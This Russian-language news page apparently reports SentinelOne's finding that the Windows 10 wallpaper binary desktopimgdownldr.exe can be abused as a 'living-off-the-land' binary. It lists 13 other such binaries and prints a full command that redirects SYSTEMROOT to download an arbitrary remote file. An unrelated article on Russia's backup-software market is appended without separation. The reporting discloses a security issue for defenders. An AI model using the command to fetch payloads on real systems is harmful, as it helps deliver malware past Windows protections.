Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Рынок резервного копирования в России разогнался до 10,6 млрд рублей

Российский рынок средств резервного копирования второй год подряд растёт быстрее всего сегмента инфраструктурного ПО. В 2025 году его объём достиг 10,6 млрд рублей, прибавив 18,5% против 16% у рынка в целом, следует из исследования Strategy Partners.

Доля отечественных решений в резервном копировании выросла с 19% в 2021 году до 70% в 2025-м.

Аналитики ожидают, что к 2030 году она достигнет 92%, а сам сегмент увеличится более чем вдвое — до 24 млрд рублей. Среднегодовой темп роста прогнозируется на уровне 17%.

Для сравнения: весь российский рынок инфраструктурного ПО в 2025 году оценили в 158 млрд рублей. За год он вырос на 16%, а доля российских разработчиков достигла 68% против 8% четырьмя годами ранее. При базовом сценарии объём рынка превысит 300 млрд рублей к 2030 году.

В сегменте резервного копирования ведущую позицию, по оценке Strategy Partners, сохраняет «Киберпротект» с продуктом «Кибер Бэкап». Среди других заметных российских решений аналитики выделяют RuBackup от «Группы Астра». Сам «Киберпротект» оценивает рынок выше — примерно в 12 млрд рублей, а собственную долю на нём в 56%.

Конкуренция тем временем переезжает от списка функций к совместимости. Заказчикам нужны системы, которые дружат с российскими платформами виртуализации, СУБД, Kubernetes, хранилищами и мониторингом, а не просто гордо складывают копии в отдельный угол.

Растёт и рынок программно-аппаратных комплексов: Strategy Partners прогнозирует увеличение со 116 млрд рублей в 2025 году до 249 млрд рублей к 2030-му.

RSS: Новости на портале Anti-Malware.ru